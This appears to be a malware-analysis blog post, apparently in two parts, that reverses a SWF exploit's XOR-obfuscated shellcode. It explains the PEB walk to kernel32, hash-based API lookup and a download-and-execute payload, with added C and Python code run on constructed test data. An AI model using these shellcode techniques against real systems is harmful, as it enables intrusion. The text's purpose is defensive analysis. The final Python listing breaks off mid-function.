href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJd3eJeHFQGvsG8fXi01wga0CXJWFcftc7oXblMtIzJy9DJEfw-C5-Q9Mtx6ppcyrP0d2wl0msUHxBigOdshG85q5YdY601lZI-ZwyOP4CdzZ9ss4rblpViUd38180peIyQr_gyrC_4JfW/s1600-h/shellcode_obfuscated.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 285px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJd3eJeHFQGvsG8fXi01wga0CXJWFcftc7oXblMtIzJy9DJEfw-C5-Q9Mtx6ppcyrP0d2wl0msUHxBigOdshG85q5YdY601lZI-ZwyOP4CdzZ9ss4rblpViUd38180peIyQr_gyrC_4JfW/s320/shellcode_obfuscated.JPG" alt="" id="BLOGGER_PHOTO_ID_5341482718917265986" border="0" /></a><br />You can load the file with IDA Pro; remember to use the 32-bit disassembler mode. 
Do a full code analysis (<span style="font-weight: bold;">Highlight</span> all the code > Press <span style="font-weight: bold;">C</span> > Select <span style="font-weight: bold;">Force</span> analysis). Here is the result, with its decryption routine:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiom-oUi2OQDdJbBJAdNaH33HOla_i-vFXY_9NjI8w1ELfI7tKd6meWW7y1eFK9UZ7Xo-W7jaYZ48QowgvilB6zbm6EAhROv1_pGLUe0gAv9xtZsAdYKQ_cyqhSyI6agJFCTklzr1vSgi3l/s1600-h/ida_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 149px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiom-oUi2OQDdJbBJAdNaH33HOla_i-vFXY_9NjI8w1ELfI7tKd6meWW7y1eFK9UZ7Xo-W7jaYZ48QowgvilB6zbm6EAhROv1_pGLUe0gAv9xtZsAdYKQ_cyqhSyI6agJFCTklzr1vSgi3l/s320/ida_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5341492826531563794" border="0" /></a><br />The reason I think this is the decryption routine is very simple: the code makes sense to me ;)<br /><br />The encrypted code calls the decryption routine before executing the payload. 
By looking at the CALL instructions, I found this portion of code that makes sense to me:<br /><br />000000EB call loc_F0 <span style="font-style: italic;">; CALL pushes the address of the next instruction (loc_F0) and jumps to the decryptor</span><br />000000F0<br />000000F0 loc_F0: <span style="font-style: italic;">; DATA XREF: 000000EB</span><br />000000F0 pop ebp <span style="font-style: italic;">; Pop that return address: EBP = runtime address of loc_F0 (position-independent code)</span><br />000000F1 add ebp, 14h <span style="font-style: italic;">; EBP = 0xF0 + 0x14 = 0x104, the start of the encrypted code</span><br />000000F4 mov ecx, 18Bh <span style="font-style: italic;">; ECX = 0x18B, the number of bytes to decrypt (loop counter)</span><br />000000F9 mov al, 3Dh ; '=' <span style="font-style: italic;">; AL = the XOR key 0x3D</span><br />000000FB<br />000000FB loc_FB: <span style="font-style: italic;">; CODE XREF: 00000100</span><br />000000FB xor [ebp+0], al <span style="font-style: italic;">; XOR the byte at EBP with the key 0x3D</span><br />000000FE inc ebp <span style="font-style: italic;">; Advance EBP to the next byte</span><br />000000FF dec ecx <span style="font-style: italic;">; Decrement the counter</span><br />00000100 jnz short loc_FB <span style="font-style: italic;">; Loop back to the XOR (offset FB) until the counter reaches zero</span><br />00000102 jmp short loc_104 <span style="font-style: italic;">; After the decryption loop, jump into the now-decrypted code at 0x104</span><br />00000104 ; ---------------------------------------------------------------------------<br />00000104<br />00000104 loc_104: ; DATA XREF: 00000102<br />00000104 lodsd <span style="font-style: italic;">; Still-encrypted bytes in the static listing: 0xAD XOR 0x3D = 0x90, so they decrypt to NOPs</span><br />00000105 lodsd<br />00000106 lodsd<br />00000107 lodsd<br />00000108 lodsd<br />00000109 lodsd<br />0000010A lodsd<br />0000010B lodsd<br /><br />I will be more than happy if anyone can tell me other ways to explain why this is the decryptor code if my own assumption is wrong :)<br /><br />So I will use Hiew again to decrypt the code. 
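The same XOR pass, written as a small C program instead of being done by hand in Hiew. This is an added example, not code from the post: it applies the routine above literally (from offset 0x104, XOR 0x18B bytes with the key 0x3D), refuses to run on a buffer shorter than the loop would touch (the decryptor itself never checks), and then looks for the "http://" string the way the Hiew screenshot reveals it. The input is constructed for the example: 0xAD filler (which decrypts to NOPs, as in the listing) with a made-up URL XOR-encoded into the payload region at an offset chosen for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parameters read straight off the decryptor listing above */
#define PAYLOAD_OFFSET 0x104   /* EBP after "add ebp, 14h": 0xF0 + 0x14 */
#define PAYLOAD_LEN    0x18B   /* ECX counter */
#define XOR_KEY        0x3D    /* AL */
#define SHELLCODE_LEN  (PAYLOAD_OFFSET + PAYLOAD_LEN)   /* 0x28F: end of the encrypted region */

/* Decrypt buf in place. Returns the number of bytes decrypted, or -1 if the
 * buffer is shorter than the loop would touch. */
long decrypt_payload(uint8_t *buf, size_t len) {
    if (buf == NULL || len < (size_t)SHELLCODE_LEN) return -1;
    uint8_t *ebp = buf + PAYLOAD_OFFSET;
    for (size_t ecx = PAYLOAD_LEN; ecx != 0; ecx--) {   /* dec ecx / jnz loc_FB */
        *ebp ^= XOR_KEY;                                /* xor [ebp+0], al */
        ebp++;                                          /* inc ebp */
    }
    return PAYLOAD_LEN;
}

/* Find the first "http://" inside the payload region (what the Hiew view
 * shows after decryption). Returns its offset, or -1 if there is none. */
long find_http(const uint8_t *buf, size_t len) {
    static const char needle[] = "http://";
    size_t nlen = sizeof needle - 1;
    for (size_t i = PAYLOAD_OFFSET; i + nlen <= len && i < SHELLCODE_LEN; i++)
        if (memcmp(buf + i, needle, nlen) == 0) return (long)i;
    return -1;
}

/* Constructed sample, NOT the real shellcode: 0x28F bytes of 0xAD filler (the
 * lodsd opcode seen in the listing; 0xAD ^ 0x3D = 0x90, a NOP) with a made-up
 * marker URL XOR-encoded into the payload region. */
#define MARKER_OFFSET (PAYLOAD_OFFSET + 0x40)          /* 0x144, chosen for the example */
static const char MARKER[] = "http://example.invalid/payload.bin";

void build_sample(uint8_t *buf) {
    memset(buf, 0xAD, SHELLCODE_LEN);
    for (size_t i = 0; i < sizeof MARKER; i++)         /* includes the NUL terminator */
        buf[MARKER_OFFSET + i] = (uint8_t)MARKER[i] ^ XOR_KEY;
}

/* Decode the constructed sample; returns the offset of the URL after
 * decryption, or -1 if the URL was visible before decryption, decryption
 * failed, or no URL appeared. */
long sample_url_offset(void) {
    uint8_t buf[SHELLCODE_LEN];
    build_sample(buf);
    if (find_http(buf, sizeof buf) != -1) return -1;   /* must be hidden while encrypted */
    if (decrypt_payload(buf, sizeof buf) != PAYLOAD_LEN) return -1;
    return find_http(buf, sizeof buf);
}

int main(void) {
    uint8_t buf[SHELLCODE_LEN];
    build_sample(buf);
    decrypt_payload(buf, sizeof buf);
    long off = find_http(buf, sizeof buf);
    if (off >= 0) printf("URL at offset 0x%lx: %s\n", off, (const char *)buf + off);
    return 0;
}
```

The bounds check is the point of doing this in code rather than by hand: with a real dump that is shorter than 0x28F bytes, Hiew would happily XOR whatever sits past the end of the region, whereas decrypt_payload reports the mismatch between the ECX counter and the file size instead.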
Take note of offset <span style="font-weight: bold;">102</span>, where the instruction jumps to offset <span style="font-weight: bold;">104</span>: that is the offset at which decryption should start. Then:<br /><br />Press <span style="font-weight: bold;">F3</span> > <span style="font-weight: bold;">F8</span> and set the XOR key to "3D":<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjanWlVpdzXVzuobzkrOsN7eWfmNnnadKmLL3JYtS5wWBCsUmsFuB-skIK4KSLULbqupWlREx0thc70WnjITWs8UZLmtRH4k6Ou8NFPk21xSNrX-EmZZ_aiIGX7IZ2nZsQpHNZl6u0YKXWc/s1600-h/shellcode_deobfuscation_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjanWlVpdzXVzuobzkrOsN7eWfmNnnadKmLL3JYtS5wWBCsUmsFuB-skIK4KSLULbqupWlREx0thc70WnjITWs8UZLmtRH4k6Ou8NFPk21xSNrX-EmZZ_aiIGX7IZ2nZsQpHNZl6u0YKXWc/s320/shellcode_deobfuscation_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5341516199257381858" border="0" /></a><br />Based on the ECX counter, we know the size of the code to decrypt is <span style="font-weight: bold;">18B</span> bytes, i.e. up to offset <span style="font-weight: bold;">28F</span>:<br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggpvtY0vDTBKR8xRDys8NYSVX3YYY7XsvAY7cSQ_OTdCKDM7oChXoYsWPXuH4RJzvrUu_fenuZT-8TGGLwzZZMkTw-1T5HYsUGrDOMHy8Y2vcq1BKWWqfVXasBNFmNqnepJ8n5fbNJz35Z/s1600-h/shellcode_deobfuscation_2.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggpvtY0vDTBKR8xRDys8NYSVX3YYY7XsvAY7cSQ_OTdCKDM7oChXoYsWPXuH4RJzvrUu_fenuZT-8TGGLwzZZMkTw-1T5HYsUGrDOMHy8Y2vcq1BKWWqfVXasBNFmNqnepJ8n5fbNJz35Z/s320/shellcode_deobfuscation_2.JPG" alt="" id="BLOGGER_PHOTO_ID_5341517908077434402" border="0" /></a><br />Save the file (<span style="font-weight: bold;">F9</span>) and you can see the URL the malware connects to in order to download an additional malicious file:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi97-kQ10SlzUHfgbgt6tyMr1GIHeN-3aHfPK2IxZUc8o9IrPZj3TCk8uDBPtb579fVpI8tnnROpigMvnZdHvk-RDpC27YBv21Io9gN19xhyphenhyphen3AxwN2VLtYRAxuIQpnEr1wRySen7nQhDieV/s1600-h/shellcode_deobfuscation_3.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi97-kQ10SlzUHfgbgt6tyMr1GIHeN-3aHfPK2IxZUc8o9IrPZj3TCk8uDBPtb579fVpI8tnnROpigMvnZdHvk-RDpC27YB21Io9gN19xhyphenhyphen3AxwN2VLtYRAxuIQpnEr1wRySen7nQhDieV/s320/shellcode_deobfuscation_3.JPG" alt="" id="BLOGGER_PHOTO_ID_5341520115176834866" border="0" /></a><br /><span style="font-weight: bold;">Shellcode Static Analysis</span><br /><br />Shellcode is designed to be as small as possible, so it normally carries only the actual malicious payload, without importing any API functions into the code itself. 
So how does the shellcode operate without the necessary APIs?<br /><br />As we are performing a static analysis, the following assumptions have been made:<br /><br /><ul><li>It will first dynamically retrieve the RVA of kernel32.dll<br /></li><li>Find kernel32.dll->LoadLibrary() to load other necessary APIs<br /></li><li>Load urlmon.dll->URLDownloadToFile() to download additional malicious files</li><li>Load kernel32.dll->WinExec() to execute the downloaded malicious files</li></ul><span style="font-weight: bold;"></span><br /><br />First of all, you might need a copy of <span style="font-weight: bold;"><a href="http://www.openrce.org/reference_library/files/reference/Windows%20Memory%20Layout,%20User-Kernel%20Address%20Spaces.pdf">Windows Memory Layout, User-Kernel Address Spaces</a> </span>and the <a href="http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf">PE Format Diagram</a> as references for the PEB structure and the PE format.<span style="font-style: italic;"><br /><br /><br /><blockquote>seg000:0000000D pop edi<br />seg000:0000000E mov eax, [fs:30] ; Save the PEB struct pointer to EAX<br />seg000:00000014 js short loc_22<br />seg000:00000016 mov eax, [eax+0Ch] ; Get the PEB_LDR_DATA struct and save it to EAX<br />seg000:00000019 mov esi, [eax+1Ch] ; PEB_LDR_DATA contains 7 elements; the one at offset 1Ch is InInitializationOrderModuleList, which links the loaded modules together<br />seg000:0000001C lodsd ; EAX = Flink, i.e. the next module entry in the list<br />seg000:0000001D mov ebp, [eax+8] ; Each entry is linked by a LIST_ENTRY (two 4-byte pointers); 8 bytes past the link is the image base of kernel32.dll, which is saved to EBP<br />seg000:00000020 jmp short loc_2B</blockquote><br /></span><br /><br />Open <span style="font-weight: bold;">Windows Memory Layout, User-Kernel Address Spaces</span> and refer to <span style="font-style: italic;">struct_TEB</span>.
Locate offset <span style="font-style: italic;">0x030</span>, which points to the <span style="font-style: italic;">_PEB </span>structure.<br /><br /><br />From <span style="font-style: italic;">struct_PEB</span>, move to offset <span style="font-style: italic;">0x0c</span>, which is the <span style="font-style: italic;">_PEB_LDR_DATA</span> structure that contains 7 elements:<br /><br /><blockquote><br />typedef struct _PEB_LDR_DATA {<br />ULONG Length; //0x000<br />BOOLEAN Initialized; //0x004<br />PVOID SsHandle; //0x008<br />LIST_ENTRY InLoadOrderModuleList; //0x00c<br />LIST_ENTRY InMemoryOrderModuleList; //0x014<br />LIST_ENTRY <span style="font-weight: bold;">InInitializationOrderModuleList</span>; //0x01c<br />PVOID EntryInProgress; //0x024<br />} PEB_LDR_DATA, *PPEB_LDR_DATA;</blockquote><span style="font-weight: bold;"><br /><br /><a href="http://undocumented.ntinternals.net/UserMode/Structures/PEB_LDR_DATA.html">InInitializationOrderModuleList</a> </span>is a doubly linked list containing pointers to <a href="http://undocumented.ntinternals.net/UserMode/Structures/LDR_MODULE.html"><span style="font-weight: bold;">LDR_MODULE</span></a> structures:<br /><br /><blockquote>typedef struct _LIST_ENTRY {<br />struct _LIST_ENTRY *Flink; //0x000<br />struct _LIST_ENTRY *Blink; //0x004<br />} LIST_ENTRY, *PLIST_ENTRY;</blockquote><br />Using this chain, we can walk every DLL module loaded by the process and therefore find kernel32.dll.
This is where the shellcode can find kernel32.dll, as it is always located as the first item on the <span style="font-weight: bold;">InInitializationOrderModuleList</span>.<br /><br /><br />After the necessary DLLs are found, it will parse the DLL's PE header to find its export table and locate the RVA of the export function whose name hash matches the hardcoded hash calculated at 0x000000DC.<br /><br />[Note: In order to understand how the shellcode parses the PE header, you need to refer to the <span style="font-weight: bold;">PE Format Diagram</span>]<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz4hV0j5isWN1NkA5ivmKbQOibCUQCeW4fheOkbbt7MscV2EG_V00bSV47VszCe9XXrrKc6VNxUKcEeJiA7Ew6t93ngiMEE17HuPMHiXMiem7FgzHxDYf7ZZhWYqgSZ50tDRtslmWvbcBH/s1600-h/ida_get_api.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 157px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz4hV0j5isWN1NkA5ivmKbQOibCUQCeW4fheOkbbt7MscV2EG_V00bSV47VszCe9XXrrKc6VNxUKcEeJiA7Ew6t93ngiMEE17HuPMHiXMiem7FgzHxDYf7ZZhWYqgSZ50tDRtslmWvbcBH/s320/ida_get_api.JPG" alt="" id="BLOGGER_PHOTO_ID_5343875064829560082" border="0" /></a><br /><br /><span style="font-weight: bold;">Final<span style="font-weight: bold;"></span><br /></span><br />I hope to show a more detailed analysis, like how the hardcoded addresses are generated, and show you how the export function is actually located and called by the shellcode. This requires us to do dynamic analysis using OllyDbg with a "bait" file. I hope there is a guideline on the Internet, as I am too lazy to find it now ;)<br /><br />I really hope to share how it can be done.
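Added example (not the post's own code): the export-table walk described above, done in Python over a constructed, minimal PE32 image so it can be run offline and compared against what the shellcode does once it has kernel32's image base. The image layout, export names and function RVAs are made up for the test; the ror-13 name hash is a commonly documented illustration and is an assumption here, since the page does not show the sample's actual hash algorithm at 0xDC.

```python
"""Resolve an exported function from a PE32 image mapped in memory.

Added example, not from the original post.  Real shellcode performs this same
walk on kernel32.dll (image base from the PEB) and compares a hash of each
export name against a hard-coded value; a defender can reuse the same walk to
see which API a given hash points at.  The PE image is constructed in-memory
test data (RVA == offset, as in a flat mapping), not a real DLL.
"""
import struct


def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]


def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def read_cstr(img, off):
    return img[off:img.index(b"\0", off)].decode("ascii")


def export_directory(img):
    """Return (rva, size) of the export data directory of a PE32 image."""
    if img[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ")
    e_lfanew = u32(img, 0x3C)
    if img[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    opt = e_lfanew + 0x18              # IMAGE_OPTIONAL_HEADER follows the 20-byte file header
    if u16(img, opt) != 0x10B:
        raise ValueError("only PE32 is handled here")
    dd = opt + 0x60                    # DataDirectory[0] = export table (PE32 layout)
    return u32(img, dd), u32(img, dd + 4)


def exports(img):
    """Yield (name, function_rva) for each named export, like the shellcode's loop."""
    exp, _ = export_directory(img)
    n_names = u32(img, exp + 0x18)     # NumberOfNames
    funcs = u32(img, exp + 0x1C)       # AddressOfFunctions
    names = u32(img, exp + 0x20)       # AddressOfNames
    ords = u32(img, exp + 0x24)        # AddressOfNameOrdinals (unbiased indices)
    for i in range(n_names):
        name = read_cstr(img, u32(img, names + 4 * i))
        ordinal = u16(img, ords + 2 * i)
        yield name, u32(img, funcs + 4 * ordinal)


def resolve(img, name):
    """Look an export up by name; None if it is not exported."""
    return next((rva for n, rva in exports(img) if n == name), None)


def ror13_hash(name):
    """Illustrative ror-13/add hash (assumption: the sample's algorithm is not on the page)."""
    h = 0
    for c in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h


def resolve_by_hash(img, wanted, hashfn):
    """Shellcode-style lookup: hash every name and compare with the hard-coded value."""
    return next((rva for n, rva in exports(img) if hashfn(n) == wanted), None)


def build_image(export_names):
    """Construct a minimal PE32 image exporting the given names (test data only)."""
    names = sorted(export_names)       # real export name tables are sorted
    n = len(names)
    img = bytearray(0x200)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                       # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 0, 0, 0, 0, 0xE0, 0x2102)  # i386 DLL
    struct.pack_into("<H", img, 0x58, 0x10B)                      # PE32 magic
    exp = 0x200
    funcs, names_tbl = exp + 0x28, exp + 0x28 + 4 * n
    ords, strs = names_tbl + 4 * n, names_tbl + 4 * n + 2 * n
    struct.pack_into("<II", img, 0x58 + 0x60, exp, 0)             # export directory entry
    body = bytearray(0x28)                                        # IMAGE_EXPORT_DIRECTORY
    struct.pack_into("<I", body, 0x10, 1)                         # Base
    struct.pack_into("<IIII", body, 0x14, n, n, funcs, names_tbl)
    struct.pack_into("<I", body, 0x24, ords)
    func_arr = b"".join(struct.pack("<I", 0x1000 + 0x10 * i) for i in range(n))
    name_arr, ord_arr, blob = bytearray(), bytearray(), bytearray()
    for i, name in enumerate(names):
        name_arr += struct.pack("<I", strs + len(blob))
        ord_arr += struct.pack("<H", i)
        blob += name.encode("ascii") + b"\0"
    img += body + func_arr + name_arr + ord_arr + blob
    struct.pack_into("<I", img, 0x58 + 0x64, len(img) - exp)      # export table size
    return bytes(img)


if __name__ == "__main__":
    image = build_image(["LoadLibraryA", "WinExec", "GetProcAddress"])
    for name, rva in exports(image):
        print("%-16s RVA 0x%x  ror13=0x%08x" % (name, rva, ror13_hash(name)))
    print("WinExec via hash ->", hex(resolve_by_hash(image, ror13_hash("WinExec"), ror13_hash)))
```

The same `exports()` walk run over a real kernel32.dll mapped at its image base, with the sample's own hash function plugged into `resolve_by_hash()`, is how an analyst turns a hard-coded hash back into an API name when documenting a sample.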
Hopefully I can motivate myself and share the knowledge here asap.<br /><br /><br /><span style="font-weight: bold;">References<br /><br /></span><a href="http://zarestel.blogspot.com/2008/06/swf-exploit-cve-2007-0071.html">http://zarestel.blogspot.com/2008/06/swf-exploit-cve-2007-0071.html</a><span style="font-weight: bold;"><br /></span><a href="http://zarestel.blogspot.com/2008/06/swf-exploit-cve-2007-0071-part-2-how-to.html">http://zarestel.blogspot.com/2008/06/swf-exploit-cve-2007-0071-part-2-how-to.html</a><span style="font-weight: bold;"><br /></span><a href="http://blog.threatexpert.com/2008/05/flash-exploit-goes-wild.html">http://blog.threatexpert.com/2008/05/flash-exploit-goes-wild.html</a><span style="font-weight: bold;"><br /></span><br /><br />Signing off<br />~x9090<br /><span style="font-weight: bold;"><br /><br /><br /></span><br /><span style="font-weight: bold;">SWF Exploit Analysis - Part 1</span> (x9090, published 2009-05-24, updated 2009-05-31)<br /><br />It has been a while since my <a href="http://x9090.blogspot.com/2009/04/manual-iat-recovery-using-imprec.html">last post</a> dated 4 April 2009. Today I'm going to talk about the technical analysis of a SWF (Flash Video) exploit file.<br /><br /><span style="font-weight: bold;">Tools Needed<br /></span><ul><li><a href="http://www.swftools.org/">SWFTools</a></li><li>Disassembler - <a href="http://www.datarescue.com/">IDA Pro</a> for static analysis</li><li>Debugger - <a href="http://www.ollydbg.de/">OllyDbg</a> for dynamic analysis</li><li><a href="http://www.hiew.ru/">Hackers View (Hiew)</a> for hex view</li><li><a href="http://www.ultraedit.com/">UltraEdit</a> for generating the shellcode<br /></li></ul><span style="font-weight: bold;">Overview<br /></span><br />The analysis is divided into 2 parts.
The first part will explain how to decompress the SWF file and extract the embedded exploit SWF file. After that it will be followed by how to locate and extract the obfuscated shellcode.<br /><br />The second part will explain how to deobfuscate the shellcode and its payload.<br /><br /><span style="font-weight: bold;">Analysis of SWF</span><br /><br />This is a screenshot of the original exploit SWF file, to give you an idea of what the file looks like:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyqiR4pzyS3YjhR_sUCo_6eu8-c56a4ZokDffCdPetb8ypqEw19HZvt-How4W57Rq0_1AEiCMhmh1HeiIz9Zzbwb6lefXvPkmF2re1297n4K93W4U2JsVuiNAYqRSZshEwAeoIjYZPntaT/s1600-h/flash_exploit.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 278px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyqiR4pzyS3YjhR_sUCo_6eu8-c56a4ZokDffCdPetb8ypqEw19HZvt-How4W57Rq0_1AEiCMhmh1HeiIz9Zzbwb6lefXvPkmF2re1297n4K93W4U2JsVuiNAYqRSZshEwAeoIjYZPntaT/s320/flash_exploit.JPG" alt="" id="BLOGGER_PHOTO_ID_5339338641844885842" border="0" /></a><br />It is totally unreadable huh! ;) That is because the SWF file is compressed, which we can tell by looking at the first 3 bytes, <span style="font-weight: bold;">CWS</span>. We can dump the tags by using <span style="font-style: italic;">swfdump.exe</span> from <span style="font-style: italic;">SWFTools</span>:<br /><br /><blockquote style="font-family: courier new;">C:\bin\swftools\swfdump.exe -atpdu flash.$wf > flash.swf.swfdump</blockquote><br /><br />Output:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig1upTAHjdu_NokFtx9K4glVsNoJiUMd3m_UqXHxxVwyhyphenhyphen-wDcp07UOLAchnYH67XZ0le5M4LOpZW7Q2m3tpg6ku46fIyGWIa9x-h7gvHEgzB-T7wKVRHTKWm7-zS1yR394JEaHxNsxIjU/s1600-h/flash_swfdump_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 281px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig1upTAHjdu_NokFtx9K4glVsNoJiUMd3m_UqXHxxVwyhyphenhyphen-wDcp07UOLAchnYH67XZ0le5M4LOpZW7Q2m3tpg6ku46fIyGWIa9x-h7gvHEgzB-T7wKVRHTKWm7-zS1yR394JEaHxNsxIjU/s320/flash_swfdump_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5339387793377234194" border="0" /></a><br />continuation...<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGjrIY5Y7LaVuErKSTq6x6-JDFIWxz_VJrJr3hEvQ5N1VczObB7Uk_4A08QQjpoh1lrDSRnNprme-fa32zS-sQbb7pYCvQiDmfwNSxlinrl8UPyG9pCqLyodb0BJzzA3tw8dj75xSHjax-/s1600-h/flash_swfdump_2.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 278px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGjrIY5Y7LaVuErKSTq6x6-JDFIWxz_VJrJr3hEvQ5N1VczObB7Uk_4A08QQjpoh1lrDSRnNprme-fa32zS-sQbb7pYCvQiDmfwNSxlinrl8UPyG9pCqLyodb0BJzzA3tw8dj75xSHjax-/s320/flash_swfdump_2.JPG" alt="" id="BLOGGER_PHOTO_ID_5339389604128971042" border="0" /></a><br />Notice that there are a number of <span style="font-weight: bold;">pushstring</span> commands, which contain the hex code of the exploit SWF file. They all generate the same exploit SWF file. Extract one of the hex strings from the <span style="font-weight: bold;">pushstring</span> commands into UltraEdit, like this:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4sdfv1fwdqlyvdL-CjEEaLykhNVNAmol_mjDovXIreCxPj3Rjtcv1u57VAGqf3U4N1TNxtMNk3ThTnl9GKS4Csf-BDyiHSpVMZvWxo9kZ5BwSxrRM117BtNYSedhnkLszekDMz25cIvD4/s1600-h/exploit_swf.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 198px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4sdfv1fwdqlyvdL-CjEEaLykhNVNAmol_mjDovXIreCxPj3Rjtcv1u57VAGqf3U4N1TNxtMNk3ThTnl9GKS4Csf-BDyiHSpVMZvWxo9kZ5BwSxrRM117BtNYSedhnkLszekDMz25cIvD4/s320/exploit_swf.JPG" alt="" id="BLOGGER_PHOTO_ID_5339399936387295074" border="0" /></a><br />Copy and paste the hex string and press a <span style="font-weight: bold;">SPACEBAR </span>(yes, a <span style="font-weight: bold;">SPACEBAR</span>!!!) to create a hex code 20.
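Added example (not the post's own code): the same extraction done in Python instead of UltraEdit, swfdump and a hex editor, and carried one step further than this point in the post, to the DEFINEBITS tag that holds the shellcode. The CWS file it parses is constructed in-memory test data with a placeholder DEFINEBITS payload, and the pushstring operand is simulated by hex-encoding that file; nothing from the sample is embedded.

```python
"""Turn a pushstring hex operand into a SWF, decompress it and find DEFINEBITS.

Added example, not from the original post.  The SWF below is constructed test
data: a background colour tag, one DEFINEBITS tag whose payload is a
placeholder blob, ShowFrame and End.  It is compressed ('CWS') exactly as the
sample in the post is, so the same three steps apply: hex -> bytes, zlib
decompress, walk the tag list for DEFINEBITS and note its offsets.
"""
import struct
import zlib

TAG_END, TAG_SHOWFRAME, TAG_DEFINEBITS, TAG_SETBACKGROUNDCOLOR = 0, 1, 6, 9


def pushstring_to_bytes(hex_text):
    """The pushstring operand is ASCII hex; this replaces the UltraEdit replace-all step."""
    return bytes.fromhex("".join(hex_text.split()))


def decompress_swf(data):
    """Return the file as an uncompressed 'FWS' SWF.

    'CWS' means everything after the 8-byte header is zlib-compressed;
    FileLength in the header is the *uncompressed* size of the whole file.
    """
    sig, version = data[:3], data[3]
    file_len = struct.unpack_from("<I", data, 4)[0]
    if sig == b"FWS":
        return data
    if sig != b"CWS":
        raise ValueError("not a SWF: signature %r" % sig)
    body = zlib.decompress(data[8:])
    if 8 + len(body) != file_len:
        raise ValueError("FileLength %d != decompressed size %d" % (file_len, 8 + len(body)))
    return b"FWS" + bytes([version]) + data[4:8] + body


def _rect_size(buf, off):
    nbits = buf[off] >> 3               # RECT: 5-bit Nbits, then 4 fields of Nbits bits each
    return (5 + 4 * nbits + 7) // 8


def iter_tags(swf):
    """Yield (code, payload_offset, payload) for each tag of an uncompressed SWF."""
    off = 8 + _rect_size(swf, 8)        # skip header and FrameSize RECT
    off += 4                            # FrameRate (u16, 8.8 fixed) + FrameCount (u16)
    while off + 2 <= len(swf):
        hdr = struct.unpack_from("<H", swf, off)[0]
        code, length = hdr >> 6, hdr & 0x3F
        off += 2
        if length == 0x3F:              # long form: explicit u32 length follows
            length = struct.unpack_from("<I", swf, off)[0]
            off += 4
        yield code, off, swf[off:off + length]
        off += length
        if code == TAG_END:
            break


def find_definebits(swf):
    """Return [(start, end, payload)] for every DEFINEBITS tag; start/end are the
    absolute file offsets you would select in a hex editor to carve the data out."""
    return [(off, off + len(p), p) for code, off, p in iter_tags(swf) if code == TAG_DEFINEBITS]


def build_test_swf(bits_payload):
    """Constructed CWS file (test data) carrying one DEFINEBITS tag."""
    def tag(code, payload):
        if len(payload) < 0x3F:
            return struct.pack("<H", (code << 6) | len(payload)) + payload
        return struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload
    body = b"\x08\x00"                                   # RECT with Nbits=1 (9 bits -> 2 bytes)
    body += struct.pack("<HH", 0x0C00, 1)               # 12.0 fps, 1 frame
    body += tag(TAG_SETBACKGROUNDCOLOR, b"\xff\xff\xff")
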